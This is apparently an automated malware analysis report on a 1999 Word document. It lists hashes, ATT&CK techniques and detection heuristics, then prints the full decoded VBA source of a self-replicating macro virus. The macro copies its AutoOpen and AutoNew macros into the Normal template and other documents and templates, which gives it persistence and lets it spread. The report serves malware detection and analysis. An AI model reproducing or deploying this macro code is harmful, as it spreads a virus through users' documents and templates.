Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e71eec0c90d4d76e…

MALICIOUS

Office (OLE)

Size: 32.0 KB
Created: 1999-06-08 21:30:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-30
MD5: ac393e6bd7551393f1a6330601149460
SHA-1: c3a4bd432773f970faaa35038202ba560f049823
SHA-256: e71eec0c90d4d76ee45803dac87e6437018ff7838cb283d4074a69166335bd0e
Risk score: 108

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The critical heuristic indicates macro-virus self-replication and AV tampering: the VBA script explicitly uses WordBasic.macrocopy and Application.OrganizerCopy to copy its AutoNew and AutoOpen macros into the Normal template, the active document, and the attached template, then saves the Normal template. This behavior establishes persistence in Word and spreads the macros to every document subsequently created or opened from those templates.

Heuristics (4)

  • VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (critical) [OLE_VBA_MACRO_VIRUS_REPLICATION]
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
        Application.OrganizerCopy Source:=mac$, _
  • AutoOpen macro (low) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script:
        ar$(2) = "AutoOpen"
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1402 bytes
SHA-256: dd7b760c3882c231fcd534b9098cf44a612250b737efc55200232ddf6ca223d3

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoNew"
Dim nor$
Dim doc$
Dim tem$
Dim mac$
Dim em
Dim ar$(2)



Sub main()
    ar$(1) = "AutoNew"
    ar$(2) = "AutoOpen"
    
    On Error Resume Next
  
    mac$ = MacroContainer.Name
    
    nor$ = NormalTemplate.Path
    nor$ = nor$ & "\" & NormalTemplate.Name
    
    doc$ = ActiveDocument.Name
    
    With ActiveDocument.AttachedTemplate
        tem$ = .Path
        tem$ = tem$ & "\" & .Name
    End With
file$ = WordBasic.[filename$]()
fil$ = file$ + ":AutoOpen"
WordBasic.macrocopy fil$, "AutoOpen"
fil1$ = file$ + ":AutoNew"
WordBasic.macrocopy fil1$, "AutoNew"
   For n% = 1 To 2
   
   Application.OrganizerCopy Source:=mac$, _
        Destination:=nor$, Name:=ar$(n%), _
        Object:=wdOrganizerObjectProjectItems
        
   Application.OrganizerCopy Source:=mac$, _
        Destination:=ActiveDocument, Name:=ar$(n%), _
        Object:=wdOrganizerObjectProjectItems
        
   Application.OrganizerCopy Source:=mac$, _
        Destination:=tem$, Name:=ar$(n%), _
        Object:=wdOrganizerObjectProjectItems

    Next n%
    NormalTemplate.Save

End Sub